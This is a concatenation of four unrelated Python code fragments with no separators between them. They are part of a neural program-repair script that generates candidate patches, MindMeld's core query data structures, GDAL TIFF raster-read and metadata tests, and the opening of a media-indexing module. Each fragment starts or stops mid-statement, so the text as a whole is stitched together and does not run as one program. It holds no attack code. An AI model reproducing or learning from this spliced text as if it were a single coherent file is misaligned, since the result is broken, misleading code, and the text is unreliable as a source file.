len(args) == 0 and len(x['params']) == 0: if mode == 0 and x['type'] != otype: continue if mode == 1 and x['type'] is not None: continue #if mode == 1 and x['type'] != "null": # continue unknown.name = x['name'] + "_ter" #print('gggg', unknown.printTree(ans.solveroot)) fans.append(unknown.printTree(ans.solveroot)) #print(x['name'], x['type'], args) if ans.type != '': if mode == 0 and len(args) > 0 and x['type'] == otype: targ = [] for y in x['params']: targ.append(y['type']) if args == targ: unknown.name = x['name'] + "_ter" fans.append(unknown.printTree(ans.solveroot)) else: #print(10) if mode == 0 and len(args) > 0: #print(11) targ = [] for y in x['params']: targ.append(y['type']) #print('p', targ, x['name'], x) if args == targ and 'type' in x and x['type'] is None: unknown.name = x['name'] + "_ter" fans.append(unknown.printTree(ans.solveroot)) elif unknown.father.name == 'qualifier': if ans.type == 'valid': return [] for x in classbody[0]['fields']: if x['type'] == vtype: unknown.name = x['name'] + "_ter" fans.append(unknown.printTree(ans.solveroot)) for x in classbody[0]['methods']: if x['type'] == vtype and len(x['params']) == 0: tmpnode = Node('MethodInvocation', -1) tmpnode1 = Node('member', -1) tmpnode2 = Node(x['name'] + "_ter", -1) tmpnode.child.append(tmpnode1) tmpnode1.father = tmpnode tmpnode1.child.append(tmpnode2) tmpnode2.father = tmpnode1 unknown.name = " ".join(tmpnode.printTree(tmpnode).split()[:-1])#tmpnode.printTree(tmpnode) fans.append(unknown.printTree(ans.solveroot)) elif unknown.father.name == 'qualifier': classbody = classcontent[sclassname + '.java']['classes'] vtype = "" for x in classbody[0]['fields']: if x['name'] == ans.type[:-4]: vtype = x['type'] break #print(5, vtype) for x in classbody[0]['fields']: if x['type'] == vtype: unknown.name = x['name'] + "_ter" fans.append(unknown.printTree(ans.solveroot)) for x in classbody[0]['methods']: if x['type'] == vtype and len(x['params']) == 0: tmpnode = Node('MethodInvocation', -1) tmpnode1 = Node('member', -1) tmpnode2 = Node(x['name'] + "_ter", -1) tmpnode.child.append(tmpnode1) tmpnode1.father = tmpnode tmpnode1.child.append(tmpnode2) tmpnode2.father = tmpnode1 unknown.name = " ".join(tmpnode.printTree(tmpnode).split()[:-1]) fans.append(unknown.printTree(ans.solveroot)) elif unknown.father.name == 'member': classname = '' if unknown.father.name == 'member': for x in unknown.father.father.child: if x.name == 'qualifier': if x.child[0].name in typedic: classname = typedic[x.child[0].name] break else: for f in classcontent[sclassname + '.java']['classes'][0]['fields']: if f['name'] == x.child[0].name[:-4]: classname = f['type'] break if x.child[0].name[:-4] + ".java" in classcontent: classname = x.child[0].name[:-4] #print(0, classname, ans.type) if classname == '': classbody = classcontent[sclassname + '.java']['classes'] elif classname != '': if classname + ".java" not in classcontent: #print(5, classname ) return [] classbody = classcontent[classname + '.java']['classes'] vtype = "" #print('type', ans.type) for x in classbody[0]['fields']: if x['name'] == ans.type[:-4]: vtype = x['type'] break if unknown.father.father.father.father and (unknown.father.father.father.father.name == 'MethodInvocation' or unknown.father.father.father.father.name == 'ClassCreator') and ans.type == "": mname = "" tname = "" if unknown.father.father.father.father.name == "MethodInvocation": tname = 'member' else: tname = 'type' for s in unknown.father.father.father.father.child: if s.name == 'member' and tname == 'member': mname = s.child[0].name if s.name == 'type' and tname == 'type': mname = s.child[0].child[0].child[0].name idx = unknown.father.father.father.child.index(unknown.father.father) #print(idx) if tname == 'member': for f in classbody[0]['methods']: if f['name'] == mname[:-4] and idx < len(f['params']): vtype = f['params'][idx]['type'] print(vtype, f['name']) break else: if mname[:-4] + ".java" not in classcontent: return [] for f in classcontent[mname[:-4] + ".java"]['classes'][0]['methods']: #print(f['name'], f['params'], mname[:-4]) if f['name'] == mname[:-4] and idx < len(f['params']): vtype = f['params'][idx]['type'] break if True: for x in classbody[0]['fields']: #print(classname, x['type'], x['name'], vtype, ans.type) if x['type'] == vtype or (x['type'] == 'double' and vtype == 'int'):# or vtype == "": unknown.name = x['name'] + "_ter" fans.append(unknown.printTree(ans.solveroot)) return fans def extarctmode(root): mode = 0 if len(root.child) == 0: return 0, None if root.child[0].name == 'modified': mode = 0 elif root.child[0].name == 'add': mode = 1 else: return 0, None print(root.printTree(root)) #assert(0) root.child.pop(0) return mode, root def solveone(data, model):#(treestr, prob, model, subroot, vardic, typedic, idx, idss, classname, mode): #os.environ["CUDA_VISIBLE_DEVICES"]="2, 3" #assert(len(data) <= 40) args.batch_size = 20 dev_set = SumDataset(args, "test") dev_set.preProcessOne(data)#x = dev_set.preProcessOne(treestr, prob) #dev_set.nl = [treestr.split()] indexs = 0 devloader = torch.utils.data.DataLoader(dataset=dev_set, batch_size=args.batch_size, shuffle=False, drop_last=False, num_workers=0) savedata = [] patch = {} for x in tqdm(devloader): if indexs < 0: indexs += 1 continue #print(indexs,indexs * args.batch_size, data[5]['oldcode']) #print(x[0][0], dev_set.data[0][idx]) #assert(np.array_equal(x[0][0], dev_set.datam[0][4])) #assert(np.array_equal(x[1][0], dev_set.datam[1][4].toarray())) #assert(np.array_equal(x[2][0], dev_set.datam[8][4])) #assert(np.array_equal(x[3][0], dev_set.datam[9][4])) #print(data[indexs]['mode'], data[indexs]['oldcode']) ans = BeamSearch((x[0], x[1], None, None, None, None, None, None, x[2], x[3]), dev_set, model, 50, args.batch_size, indexs) for i in range(len(ans)): currid = indexs * args.batch_size + i idss = data[currid]['idss'] subroot = data[currid]['subroot'] if os.path.exists("../result/%s.json" % idss): classcontent = json.load(open("../result/%s.json" % idss, 'r') ) else: classcontent = [] classcontent.extend(json.load(open("temp.json", 'r'))) rrdicts = {} for x in classcontent: rrdicts[x['filename']] = x if 'package_name' in x: rrdicts[x['package_name'] + "." + x['filename']] = x vardic = data[currid]['vardic'] typedic = data[currid]['typedic'] classname = data[currid]['classname']#data[currid]['classname'].split(".")[-1] #print(classname) #assert(0) mode = data[currid]['mode'] rrdict = {} for x in vardic: rrdict[vardic[x]] = x for j in range(len(ans[i])): if j > 30 and idss != 'Lang-33': break mode, ans[i][j].root = extarctmode(ans[i][j].root) if ans[i][j].root is None: continue print(j, ans[i][j].root.printTree(ans[i][j].root)) applyoperater(ans[i][j], subroot) #print(j, ans[i][j].root.printTree(ans[i][j].solveroot)) an = replaceVar(ans[i][j].solveroot, rrdict) #print(j, ans[i][j].root.printTree(ans[i][j].solveroot)) if not an: continue #print(7, ans[i][j].type) try: tcodes = solveUnknown(ans[i][j], vardic, typedic, rrdicts, classname, mode) except Exception as e: traceback.print_exc() tcodes = [] print(tcodes) for code in tcodes: if code.split(" ")[0] != 'root': assert(0) if str(mode) + code + str(data[currid]['line']) not in patch: patch[str(mode) + code + str(data[currid]['line'])] = 1 else: continue savedata.append({'id':currid, 'idss':idss, 'precode':data[currid]['precode'], 'aftercode':data[currid]['aftercode'], 'oldcode':data[currid]['oldcode'], 'filename':data[currid]['filepath'], 'mode':mode, 'code':code, 'line':data[currid]['line'], 'isa':data[currid]['isa']}) indexs += 1 #for x in savedata: # print(x['oldcode'], x['code']) #exit(0) #f.write(" ".join(ans.ans[1:-1])) #f.write("\n") #f.flush()#print(ans) #print(x[0][0], dev_set.data[0][idx]) #assert(np.array_equal(x[0][0], dev_set.data[0][idx])) #assert(np.array_equal(x[1][0], dev_set.data[1][idx].toarray())) #assert(np.array_equal(x[2][0], dev_set.data[8][idx])) #assert(np.array_equal(x[3][0], dev_set.data[9][idx])) open('patchmu/%s.json' % data[0]['idss'], 'w').write(json.dumps(savedata, indent=4)) def solveone2(data, model):#(treestr, prob, model,
# -*- coding: utf-8 -*- # # Copyright (c) 2015 Cisco Systems, Inc. and others. All rights reserved. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """This module contains a collection of the core data structures used in MindMeld.""" import logging TEXT_FORM_RAW = 0 TEXT_FORM_PROCESSED = 1 TEXT_FORM_NORMALIZED = 2 TEXT_FORMS = [TEXT_FORM_RAW, TEXT_FORM_PROCESSED, TEXT_FORM_NORMALIZED] logger = logging.getLogger(__name__) # The date keys are extracted from here # https://github.com/wit-ai/duckling_old/blob/a4bc34e3e945d403a9417df50c1fb2172d56de3e/src/duckling/time/obj.clj#L21 # noqa E722 TIME_GRAIN_TO_ORDER = { "year": 8, "quarter": 7, "month": 6, "week": 5, "day": 4, "hour": 3, "minute": 2, "second": 1, "milliseconds": 0, } def _sort_by_lowest_time_grain(system_entities): return sorted( system_entities, key=lambda query_entity: TIME_GRAIN_TO_ORDER[ query_entity.entity.value["grain"] ], ) class Bunch(dict): """Dictionary-like object that exposes its keys as attributes. Inspired by scikit learn's Bunches >>> b = Bunch(a=1, b=2) >>> b['b'] 2 >>> b.b 2 >>> b.a = 3 >>> b['a'] 3 >>> b.c = 6 >>> b['c'] 6 """ def __init__(self, **kwargs): super().__init__(kwargs) def __setattr__(self, key, value): self[key] = value def __dir__(self): return self.keys() def __getattr__(self, key): try: return self[key] except KeyError: raise AttributeError(key) def __setstate__(self, state): pass class Span: """Object representing a text span with start and end indices Attributes: start (int): The index from the original text that represents the start of the span end (int): The index from the original text that represents the end of the span """ __slots__ = ["start", "end"] def __init__(self, start, end): assert start <= end, "Span 'start' must be less than or equal to 'end'" self.start = start self.end = end def to_dict(self): """Converts the span into a dictionary""" return {"start": self.start, "end": self.end} def slice(self, obj): """Returns the slice of the object for this span Args: obj: The object to slice Returns: The slice of the passed in object for this span """ return obj[self.start : self.end + 1] def shift(self, offset): """Shifts a span by offset Args: offset (int): The number to change start and end by """ return Span(self.start + offset, self.end + offset) def __iter__(self): for index in range(self.start, self.end + 1): yield index def __len__(self): return self.end - self.start + 1 def __eq__(self, other): if isinstance(other, self.__class__): return self.start == other.start and self.end == other.end return NotImplemented def __ne__(self, other): if isinstance(other, self.__class__): return not self.__eq__(other) return NotImplemented def __repr__(self): return "{}(start={}, end={})".format( self.__class__.__name__, self.start, self.end ) class Query: """The query object is responsible for processing and normalizing raw user text input so that classifiers can deal with it. A query stores three forms of text: raw text, processed text, and normalized text. The query object is also responsible for translating text ranges across these forms. Attributes: raw_text (str): the original input text processed_text (str): the text after it has been preprocessed. The pre-processing happens at the application level and is generally used for special characters normalized_tokens (tuple of str): a list of normalized tokens system_entity_candidates (tuple): A list of system entities extracted from the text locale (str, optional): The locale representing the ISO 639-1 language code and \ ISO3166 alpha 2 country code separated by an underscore character. language (str, optional): The language code representing ISO 639-1 language codes. time_zone (str): The IANA id for the time zone in which the query originated such as 'America/Los_Angeles' timestamp (long, optional): A unix timestamp used as the reference time If not specified, the current system time is used. If `time_zone` is not also specified, this parameter is ignored stemmed_tokens (list): A sequence of stemmed tokens for the query text """ # TODO: look into using __slots__ def __init__( self, raw_text, processed_text, normalized_tokens, char_maps, locale=None, language=None, time_zone=None, timestamp=None, stemmed_tokens=None, ): """Creates a query object Args: raw_text (str): the original input text processed_text (str): the input text after it has been preprocessed normalized_tokens (list of dict): List tokens outputted by a tokenizer char_maps (dict): Mappings between character indices in raw, processed and normalized text """ self._normalized_tokens = normalized_tokens norm_text = " ".join([t["entity"] for t in self._normalized_tokens]) self._texts = (raw_text, processed_text, norm_text) self._char_maps = char_maps self.system_entity_candidates = () self._locale = locale self._language = language self._time_zone = time_zone self._timestamp = timestamp self.stemmed_tokens = stemmed_tokens or tuple() @property def text(self): """The original input text""" return self._texts[TEXT_FORM_RAW] @property def processed_text(self): """The input text after it has been preprocessed""" return self._texts[TEXT_FORM_PROCESSED] @property def normalized_text(self): """The normalized input text""" return self._texts[TEXT_FORM_NORMALIZED] @property def stemmed_text(self): """The stemmed input text""" return " ".join(self.stemmed_tokens) @property def normalized_tokens(self): """The tokens of the normalized input text""" return tuple((token["entity"] for token in self._normalized_tokens)) @property def language(self): """Language of the query specified using a 639-2 code.""" return self._language @property def locale(self): """The locale representing the ISO 639-1/2 language code and ISO3166 alpha 2 country code separated by an underscore character.""" return self._locale @property def time_zone(self): """The IANA id for the time zone in which the query originated such as 'America/Los_Angeles'. """ return self._time_zone @property def timestamp(self): """A unix timestamp for when the time query was created. If `time_zone` is None, this parameter is ignored. """ return self._timestamp def get_text_form(self, form): """Programmatically retrieves text by form Args: form (int): A valid text form (TEXT_FORM_RAW, TEXT_FORM_PROCESSED, or TEXT_FORM_NORMALIZED) Returns: str: The requested text """ return self._texts[form] def get_system_entity_candidates(self, sys_types): """ Args: sys_types (set of str): A set of entity types to select Returns: list: Returns candidate system entities of the types specified """ return [e for e in self.system_entity_candidates if e.entity.type in sys_types] def transform_span(self, text_span, form_in, form_out): """Transforms a text range from one form to another. Args: text_span (Span): the text span being transformed form_in (int): the input text form. Should be one of TEXT_FORM_RAW, TEXT_FORM_PROCESSED or TEXT_FORM_NORMALIZED form_out (int): the output text form. Should be one of TEXT_FORM_RAW, TEXT_FORM_PROCESSED or TEXT_FORM_NORMALIZED Returns: tuple: the equivalent range of text in the output form """ return Span( self.transform_index(text_span.start, form_in, form_out), self.transform_index(text_span.end, form_in, form_out), ) def transform_index(self, index, form_in, form_out): """Transforms a text index from one form to another. Args: index (int): the index being transformed form_in (int): the input form. should be one of TEXT_FORM_RAW form_out (int): the output form Returns: int: the equivalent index of text in the output form """ if form_in not in TEXT_FORMS or form_out not in TEXT_FORMS: raise ValueError("Invalid text form") if form_in > form_out: while form_in > form_out: index = self._unprocess_index(index, form_in) form_in -= 1 else: while form_in < form_out: index = self._process_index(index, form_in) form_in += 1 return index def _process_index(self, index, form_in): if form_in == TEXT_FORM_NORMALIZED: raise ValueError( "'{}' form cannot be processed".format(TEXT_FORM_NORMALIZED) ) mapping_key = (form_in, (form_in + 1)) try: mapping = self._char_maps[mapping_key] except KeyError: # mapping doesn't exist -> use identity return index # None for mapping means 1-1 mapping try: return mapping[index] if mapping else index except KeyError: raise ValueError("Invalid index {}".format(index)) def _unprocess_index(self, index, form_in): if form_in == TEXT_FORM_RAW: raise ValueError("'{}' form cannot be unprocessed".format(TEXT_FORM_RAW)) mapping_key = (form_in, (form_in - 1)) try: mapping = self._char_maps[mapping_key] except KeyError: # mapping doesn't exist -> use identity return index # None for mapping means 1-1 mapping try: return mapping[index] if mapping else index except KeyError: raise ValueError("Invalid index {}".format(index)) def __eq__(self, other): if isinstance(other, self.__class__): return self.__dict__ == other.__dict__ return NotImplemented def __ne__(self, other): if isinstance(other, self.__class__): return not self.__eq__(other) return NotImplemented def __repr__(self): return "<{} {!r}>".format(self.__class__.__name__, self.text) class ProcessedQuery: """A processed query contains a query and the additional metadata that has been labeled or predicted. Attributes: query (Query): The underlying query object. domain (str): The domain of the query entities (list): A list of entities present in this query intent (str): The intent of the query is_gold
= ds.ReadRaster(xoff, yoff, xsize, ysize, buf_xsize=4 * xsize, buf_ysize=4 * ysize) ref_nbands_data_native_type_downsampled_x_upsampled_y = ds.ReadRaster(xoff, yoff, xsize, ysize, buf_xsize=int(xsize / 2), buf_ysize=32 * ysize) ref_nbands_data_native_type_unordered_list = ds.ReadRaster(xoff, yoff, xsize, ysize, band_list=[nbands - i for i in range(nbands)]) ref_nbands_data_native_type_pixel_interleaved = ds.ReadRaster(xoff, yoff, xsize, ysize, buf_pixel_space=nbands * dt_size, buf_band_space=dt_size) ref_nbands_data_native_type_pixel_interleaved_whole = ds.ReadRaster(buf_pixel_space=nbands * dt_size, buf_band_space=dt_size) ref_nbands_m_1_data_native_type_pixel_interleaved_with_extra_space = ds.ReadRaster(xoff, yoff, xsize, ysize, band_list=[i + 1 for i in range(nbands - 1)], buf_pixel_space=nbands * dt_size, buf_band_space=dt_size) ref_nbands_data_float32 = ds.ReadRaster(xoff, yoff, xsize, ysize, buf_type=gdal.GDT_Float32) ref_nbands_data_float32_pixel_interleaved = ds.ReadRaster(xoff, yoff, xsize, ysize, buf_type=gdal.GDT_Float32, buf_pixel_space=nbands * sizeof_float, buf_band_space=1 * sizeof_float) ref_nbands_data_native_type_custom_spacings = ds.ReadRaster(xoff, yoff, xsize, ysize, buf_pixel_space=2 * nbands * dt_size, buf_band_space=dt_size) if nbands == 3: ref_nbands_data_native_type_custom_spacings_2 = ds.ReadRaster(xoff, yoff, xsize, ysize, buf_pixel_space=4 * dt_size, buf_band_space=dt_size) if truncated: gdal.PopErrorHandler() ds = None if truncated: gdal.PushErrorHandler() old_val = gdal.GetConfigOption(option) gdal.SetConfigOption(option, 'YES') ds = gdal.Open(filename) band_interleaved = ds.GetMetadataItem('INTERLEAVE', 'IMAGE_STRUCTURE') == 'BAND' got_data_native_type = ds.GetRasterBand(1).ReadRaster(xoff, yoff, xsize, ysize) got_data_native_type_whole = ds.GetRasterBand(1).ReadRaster() got_data_native_type_downsampled = ds.GetRasterBand(1).ReadRaster(xoff, yoff, xsize, ysize, buf_xsize=int(xsize / 2), buf_ysize=int(ysize / 2)) got_data_native_type_downsampled_not_nearest = ds.GetRasterBand(1).ReadRaster(xoff, yoff, xsize, ysize, buf_xsize=int(xsize / 2), buf_ysize=int(ysize / 2), resample_alg=gdal.GRIORA_Bilinear) got_data_native_type_upsampled = ds.GetRasterBand(1).ReadRaster(xoff, yoff, xsize, ysize, buf_xsize=nbands * xsize, buf_ysize=nbands * ysize) got_data_native_type_custom_spacings = ds.GetRasterBand(1).ReadRaster(xoff, yoff, xsize, ysize, buf_pixel_space=nbands * dt_size) got_data_float32 = ds.GetRasterBand(1).ReadRaster(xoff, yoff, xsize, ysize, buf_type=gdal.GDT_Float32) got_nbands_data_native_type = ds.ReadRaster(xoff, yoff, xsize, ysize) got_nbands_data_native_type_whole = ds.ReadRaster() got_nbands_data_native_type_bottom_right_downsampled = ds.ReadRaster(ds.RasterXSize - 2, ds.RasterYSize - 1, 2, 1, buf_xsize=1, buf_ysize=1, buf_pixel_space=nbands * dt_size, buf_band_space=dt_size) got_nbands_data_native_type_downsampled = ds.ReadRaster(xoff, yoff, xsize, ysize, buf_xsize=int(xsize / 2), buf_ysize=int(ysize / 2)) got_nbands_data_native_type_downsampled_interleaved = ds.ReadRaster(xoff, yoff, xsize, ysize, buf_xsize=int(xsize / 2), buf_ysize=int(ysize / 2), buf_pixel_space=nbands * dt_size, buf_band_space=dt_size) got_nbands_data_native_type_downsampled_not_nearest = ds.ReadRaster(xoff, yoff, xsize, ysize, buf_xsize=int(xsize / 2), buf_ysize=int(ysize / 2), resample_alg=gdal.GRIORA_Bilinear) got_nbands_data_native_type_upsampled = ds.ReadRaster(xoff, yoff, xsize, ysize, buf_xsize=4 * xsize, buf_ysize=4 * ysize) got_nbands_data_native_type_downsampled_x_upsampled_y = ds.ReadRaster(xoff, yoff, xsize, ysize, buf_xsize=int(xsize / 2), buf_ysize=32 * ysize) got_nbands_data_native_type_unordered_list = ds.ReadRaster(xoff, yoff, xsize, ysize, band_list=[nbands - i for i in range(nbands)]) got_nbands_data_native_type_pixel_interleaved = ds.ReadRaster(xoff, yoff, xsize, ysize, buf_pixel_space=nbands * dt_size, buf_band_space=dt_size) got_nbands_data_native_type_pixel_interleaved_whole = ds.ReadRaster(buf_pixel_space=nbands * dt_size, buf_band_space=dt_size) got_nbands_m_1_data_native_type_pixel_interleaved_with_extra_space = ds.ReadRaster(xoff, yoff, xsize, ysize, band_list=[i + 1 for i in range(nbands - 1)], buf_pixel_space=nbands * dt_size, buf_band_space=dt_size) got_nbands_data_float32 = ds.ReadRaster(xoff, yoff, xsize, ysize, buf_type=gdal.GDT_Float32) got_nbands_data_float32_pixel_interleaved = ds.ReadRaster(xoff, yoff, xsize, ysize, buf_type=gdal.GDT_Float32, buf_pixel_space=nbands * sizeof_float, buf_band_space=1 * sizeof_float) got_nbands_data_native_type_custom_spacings = ds.ReadRaster(xoff, yoff, xsize, ysize, buf_pixel_space=2 * nbands * dt_size, buf_band_space=dt_size) if nbands == 3: got_nbands_data_native_type_custom_spacings_2 = ds.ReadRaster(xoff, yoff, xsize, ysize, buf_pixel_space=4 * dt_size, buf_band_space=dt_size) ds = None gdal.SetConfigOption(option, old_val) if truncated: gdal.PopErrorHandler() gdal.Unlink(filename) if ref_data_native_type != got_data_native_type: print(option) pytest.fail(i) if truncated and not band_interleaved: if got_data_native_type_whole is not None: print(truncated) print(band_interleaved) print(option) print(i) pytest.fail(gdal.GetDataTypeName(dt)) elif ref_data_native_type_whole != got_data_native_type_whole: print(i) pytest.fail(option) if ref_data_native_type_downsampled != got_data_native_type_downsampled: print(option) pytest.fail(i) if not truncated and ref_data_native_type_downsampled_not_nearest != got_data_native_type_downsampled_not_nearest: print(band_interleaved) print(option) pytest.fail(i) if ref_data_native_type_upsampled != got_data_native_type_upsampled: print(option) pytest.fail(i) for y in range(ysize): for x in range(xsize): for k in range(dt_size): if ref_data_native_type_custom_spacings[(y * xsize + x) * nbands * dt_size + k] != got_data_native_type_custom_spacings[(y * xsize + x) * nbands * dt_size + k]: print(gdal.GetDataTypeName(dt)) print(option) pytest.fail(i) if not truncated: for band in range(nbands): if ref_nbands_data_native_type_custom_spacings[(y * xsize + x) * 2 * nbands * dt_size + band * dt_size + k] != got_nbands_data_native_type_custom_spacings[(y * xsize + x) * 2 * nbands * dt_size + band * dt_size + k]: print(gdal.GetDataTypeName(dt)) print(option) pytest.fail(i) if nbands == 3: for band in range(nbands): if ref_nbands_data_native_type_custom_spacings_2[(y * xsize + x) * 4 * dt_size + band * dt_size + k] != got_nbands_data_native_type_custom_spacings_2[(y * xsize + x) * 4 * dt_size + band * dt_size + k]: print(gdal.GetDataTypeName(dt)) print(option) pytest.fail(i) if ref_data_float32 != got_data_float32: print(gdal.GetDataTypeName(dt)) print(option) pytest.fail(i) if not truncated and ref_nbands_data_native_type != got_nbands_data_native_type: print(band_interleaved) print(option) pytest.fail(i) if truncated: if got_nbands_data_native_type_whole is not None: print(gdal.GetDataTypeName(dt)) print(option) pytest.fail(i) elif ref_nbands_data_native_type_whole != got_nbands_data_native_type_whole: print(option) print(i) pytest.fail(gdal.GetDataTypeName(dt)) if truncated: if got_nbands_data_native_type_pixel_interleaved_whole is not None: print(option) pytest.fail(i) elif ref_nbands_data_native_type_pixel_interleaved_whole != got_nbands_data_native_type_pixel_interleaved_whole: print(i) pytest.fail(option) if truncated and got_nbands_data_native_type_bottom_right_downsampled is not None: print(gdal.GetDataTypeName(dt)) print(option) pytest.fail(i) if truncated: continue if ref_nbands_data_native_type_downsampled != got_nbands_data_native_type_downsampled: print(option) pytest.fail(i) if ref_nbands_data_native_type_downsampled_interleaved != got_nbands_data_native_type_downsampled_interleaved: print(option) pytest.fail(i) if ref_nbands_data_native_type_downsampled_not_nearest != got_nbands_data_native_type_downsampled_not_nearest: print(option) pytest.fail(i) if ref_nbands_data_native_type_upsampled != got_nbands_data_native_type_upsampled: print(option) # import struct # f1 = open('out1.txt', 'wb') # f2 = open('out2.txt', 'wb') # for b in range(nbands): # for y in range(4 * ysize): # f1.write('%s\n' % str(struct.unpack('B' * 4 * xsize, ref_nbands_data_native_type_upsampled[(b * 4 * ysize + y) * 4 * xsize : (b * 4 * ysize + y + 1) * 4 * xsize]))) # f2.write('%s\n' % str(struct.unpack('B' * 4 * xsize, got_nbands_data_native_type_upsampled[(b * 4 * ysize + y) * 4 * xsize : (b * 4 * ysize + y + 1) * 4 * xsize]))) pytest.fail(i) if ref_nbands_data_native_type_downsampled_x_upsampled_y != got_nbands_data_native_type_downsampled_x_upsampled_y: print(option) # import struct # f1 = open('out1.txt', 'wb') # f2 = open('out2.txt', 'wb') # for b in range(nbands): # for y in range(32 * ysize): # f1.write('%s\n' % str(struct.unpack('B' * int(xsize/2), ref_nbands_data_native_type_downsampled_x_upsampled_y[(b * 32 * ysize + y) * int(xsize/2) : (b * 32 * ysize + y + 1) * int(xsize/2)]))) # f2.write('%s\n' % str(struct.unpack('B' * int(xsize/2), got_nbands_data_native_type_downsampled_x_upsampled_y[(b * 32 * ysize + y) * int(xsize/2) : (b * 32 * ysize + y + 1) * int(xsize/2)]))) pytest.fail(i) if ref_nbands_data_native_type_unordered_list != got_nbands_data_native_type_unordered_list: print(option) pytest.fail(i) if ref_nbands_data_native_type_pixel_interleaved != got_nbands_data_native_type_pixel_interleaved: print(option) pytest.fail(i) for y in range(ysize): for x in range(xsize): for b in range(nbands - 1): for k in range(dt_size): if ref_nbands_m_1_data_native_type_pixel_interleaved_with_extra_space[((y * xsize + x) * nbands + b) * dt_size + k] != got_nbands_m_1_data_native_type_pixel_interleaved_with_extra_space[((y * xsize + x) * nbands + b) * dt_size + k]: print(option) pytest.fail(i) if ref_nbands_data_float32 != got_nbands_data_float32: print(option) pytest.fail(i) if ref_nbands_data_float32_pixel_interleaved != got_nbands_data_float32_pixel_interleaved: print(option) pytest.fail(i) ds = gdal.Open('data/byte.tif') # any GTiff file will do unreached = ds.GetMetadataItem('UNREACHED_VIRTUALMEMIO_CODE_PATH', '_DEBUG_') ds = None if unreached: print('unreached = %s' % unreached) pytest.fail('missing code coverage in VirtualMemIO()') ############################################################################### # Check read Digital Globe metadata IMD & RPB format def test_tiff_read_md1(): try: os.remove('data/md_dg.tif.aux.xml') except OSError: pass ds = gdal.Open('data/md_dg.tif', gdal.GA_ReadOnly) filelist = ds.GetFileList() assert len(filelist) == 3, 'did not get expected file list.' metadata = ds.GetMetadataDomainList() assert len(metadata) == 6, 'did not get expected metadata list.' md = ds.GetMetadata('IMAGERY') assert 'SATELLITEID' in md, 'SATELLITEID not present in IMAGERY Domain' assert 'CLOUDCOVER' in md, 'CLOUDCOVER not present in IMAGERY Domain' assert 'ACQUISITIONDATETIME' in md, \ 'ACQUISITIONDATETIME not present in IMAGERY Domain' # Test UTC date assert md['ACQUISITIONDATETIME'] == '2010-04-01 12:00:00', \ 'bad value for IMAGERY[ACQUISITIONDATETIME]' ds = None assert not os.path.exists('data/md_dg.tif.aux.xml') ############################################################################### # Check read Digital Globe metadata XML format def test_tiff_read_md2(): try: os.remove('data/md_dg_2.tif.aux.xml') except OSError: pass ds = gdal.Open('data/md_dg_2.tif', gdal.GA_ReadOnly) filelist = ds.GetFileList() assert len(filelist) == 2, 'did not get expected file list.' metadata = ds.GetMetadataDomainList() assert len(metadata) == 6, 'did not get expected metadata list.' md = ds.GetMetadata('IMAGERY') assert 'SATELLITEID' in md, 'SATELLITEID not present in IMAGERY Domain' assert 'CLOUDCOVER' in md, 'CLOUDCOVER not present in IMAGERY Domain' assert 'ACQUISITIONDATETIME' in md, \ 'ACQUISITIONDATETIME not present in IMAGERY Domain' # Test UTC date assert md['ACQUISITIONDATETIME'] == '2011-05-01 13:00:00', \ 'bad value for IMAGERY[ACQUISITIONDATETIME]' ds = None assert not os.path.exists('data/md_dg_2.tif.aux.xml') ############################################################################### # Check read GeoEye metadata format def test_tiff_read_md3(): try: os.remove('data/md_ge_rgb_0010000.tif.aux.xml') except OSError: pass ds = gdal.Open('data/md_ge_rgb_0010000.tif', gdal.GA_ReadOnly) filelist = ds.GetFileList() assert len(filelist) == 3, 'did not get expected file list.' metadata = ds.GetMetadataDomainList() assert len(metadata) == 6, 'did not get expected metadata list.' md = ds.GetMetadata('IMAGERY') assert 'SATELLITEID' in md, 'SATELLITEID not present in IMAGERY Domain' assert 'CLOUDCOVER' in md, 'CLOUDCOVER not present in IMAGERY Domain' assert 'ACQUISITIONDATETIME' in md, \ 'ACQUISITIONDATETIME not present in IMAGERY Domain' # Test UTC date assert md['ACQUISITIONDATETIME'] == '2012-06-01 14:00:00', \ 'bad value for IMAGERY[ACQUISITIONDATETIME]' ds = None assert not os.path.exists('data/md_ge_rgb_0010000.tif.aux.xml') ############################################################################### # Check read OrbView metadata format def test_tiff_read_md4(): try: os.remove('data/md_ov.tif.aux.xml') except OSError: pass ds = gdal.Open('data/md_ov.tif', gdal.GA_ReadOnly) filelist = ds.GetFileList() assert len(filelist) == 3, 'did not get expected file list.' metadata = ds.GetMetadataDomainList() assert len(metadata) == 6, 'did not get expected metadata list.' md = ds.GetMetadata('IMAGERY') assert 'SATELLITEID' in md, 'SATELLITEID not present
import datetime import io import json_tricks import logging import os from os.path import (abspath, basename, dirname, exists, expanduser, join, realpath, relpath, splitext) import re import shutil import sys from traits.api import (Any, Dict, Enum, HasTraits, Instance, List, Long, Str) from whoosh import fields, qparser, query from whoosh.util.times import datetime_to_long, long_to_datetime from .common import get_project_dir from .media import Media, MediaData, get_media_data from .directory import Directory from . import processor logger = logging.getLogger(__name__) if sys.version_info[0] > 2: unicode = str string_types = (str,) import csv else: string_types = (basestring,) import backports.csv as csv INT = fields.NUMERIC(numtype=int) FLOAT = fields.NUMERIC(numtype=float) def get_file_saved_time(path): dt = datetime.datetime.fromtimestamp(os.stat(path).st_ctime) return dt.ctime() def _get_sample(fname): sample = '' with io.open(fname, 'r', newline='', encoding='utf-8') as fp: sample += fp.readline() + fp.readline() return sample def _get_csv_headers(fname): sample = _get_sample(fname) sniffer = csv.Sniffer() has_header = sniffer.has_header(sample) dialect = sniffer.sniff(sample) with io.open(fname, 'r', newline='', encoding='utf-8') as fp: reader = csv.reader(fp, dialect) header = next(reader) return has_header, header, dialect class TagInfo(HasTraits): name = Str type = Enum("string", "text", "int", "float", "bool") default = Any def __repr__(self): return 'TagInfo(%r, %r)' % (self.name, self.type) def _default_default(self): map = {"string": "", "text": "", "int": 0, "float": 0.0, "bool": False} return map[self.type] def open_file(fname_or_file, mode='rb'): if hasattr(fname_or_file, 'read'): return fname_or_file else: return open(fname_or_file, mode) def sanitize_name(name): name = name.lower() name = re.sub(r'\s+', '_', name) return re.sub(r'\W+', '', name) def get_non_existing_filename(fname): if exists(fname): base, ext = splitext(basename(fname)) return join(dirname(fname), base + '_a' + ext) else: return fname COMMON_TAGS = dict( file_name='string', path='string', 